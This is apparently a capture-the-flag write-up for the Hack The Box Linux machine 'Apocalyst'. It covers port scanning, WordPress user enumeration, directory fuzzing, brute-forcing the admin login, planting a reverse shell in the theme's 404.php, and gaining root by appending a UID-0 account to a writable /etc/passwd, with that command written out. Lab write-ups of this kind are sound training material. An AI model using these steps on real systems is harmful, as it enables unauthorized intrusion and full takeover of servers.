[*] INDEX:
[+] BOX INFO 💻 :
Operative System : Linux 🐧
Difficulty : Medium 🌓
Owner : Dosk3n
IP : 10.10.10.46
[+] PART 1 - GAIN ACCESS
The first step is scanning machine’s ports with nmap:
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Once seen open ports, let’s get a deeper scan :
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fd:ab:0f:c9:22:d5:f4:8f:7a:0a:29:11:b4:04:da:c9 (RSA)
| 256 76:92:39:0a:57:bd:f0:03:26:78:c7:db:1a:66:a5:bc (ECDSA)
|_ 256 12:12:cf:f1:7f:be:43:1f:d5:e6:6d:90:84:25:c8:bd (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apocalypse Preparation Blog
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Here we just can point out the http server, so, let’s check it :
We can see a Wordpress site, so first and foremost, let’s run wpscan
:
wpscan -e –url http://apocalyst.htb/
Nice, we got the user! Now let’s fuzz the site, in my case I’ll be using ffuf
ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -u http://apocalyst.htb/FUZZ
But there is nothing interesting… Once reached this pont, I didn’t really know what to do, so I tried to create a custom wordlist with the tool cewl
:
cewl -w apocalyst.wordlist http://apocalyst.htb/
Once we get the wordlist, let’s fuzz the website again, in my case I’ll be using wfuzz because with this tool we can see the chars :
wfuzz -u http://apocalyst.htb/FUZZ/ -w apocalyst.wordlist –hc 404
We can see that all durectiries return a total of 157 chars :
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://apocalyst.htb/FUZZ/
Total requests: 532
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 13 L 17 W 157 Ch "the"
000000043: 200 13 L 17 W 157 Ch "from"
000000031: 200 13 L 17 W 157 Ch "End"
000000007: 200 13 L 17 W 157 Ch "Blog"
000000045: 200 13 L 17 W 157 Ch "then"
000000015: 200 13 L 17 W 157 Ch "are"
000000035: 200 13 L 17 W 157 Ch "Assumptio"
So let’s filter by that :
wfuzz -u http://apocalyst.htb/FUZZ/ -w apocalyst.wordlist –hc 404 –hh 157
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://apocalyst.htb/FUZZ/
Total requests: 532
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000455: 200 14 L 20 W 175 Ch "Rightiousness"
Interesting… Let’s try to do some stego :
Actually I didn’t know what it is for, so I tried everything. I tried to brute-force wordpress login with the username falaraki :
wpscan -U falaraki –url http://apocalyst.htb/ -P list.txt
So, let’s login visiting /wp-admin
:
Now as usual, let’s try to stablish a reverse shell :
Now let’s try to change the 404.php script to a reverse shell, in my case I’ll be using this one from pentest monkey
Now let’s visit the site and try to get a 404, but first of all let’s listen from our local machine :
Now let’s change the url to -> http://apocalyst.htb/?p=1000
And let’s see :
To get a more comfortable shell, let’s run :
python3 -c 'import pty; pty.spawn("/bin/bash")'
export SHELL=bash
export TERM=xterm-256color
stty rows 59 columns 235
[+] PART 2 - PRIVESC
Let’s run linpeas.sh
Let’s start a python http server again and get the file from the browser :
From our local machine :
From the victim machine :
./linpeas.sh
Wow so /etc/passwd is writtable. In this post everythig is quite well explained, so let’s add this to /etc/passwd :
From our local machine :
openssl passwd -1
(I wrote “pass”)
From the victim machine :
Let’s create a user :
echo ‘maiky:$1$pCtoMGME$NpDbW6N2knP6pl9SCpag1.:0:0:maiky:/home/astra:/bin/bash’ » /etc/passwd
And then switch the user :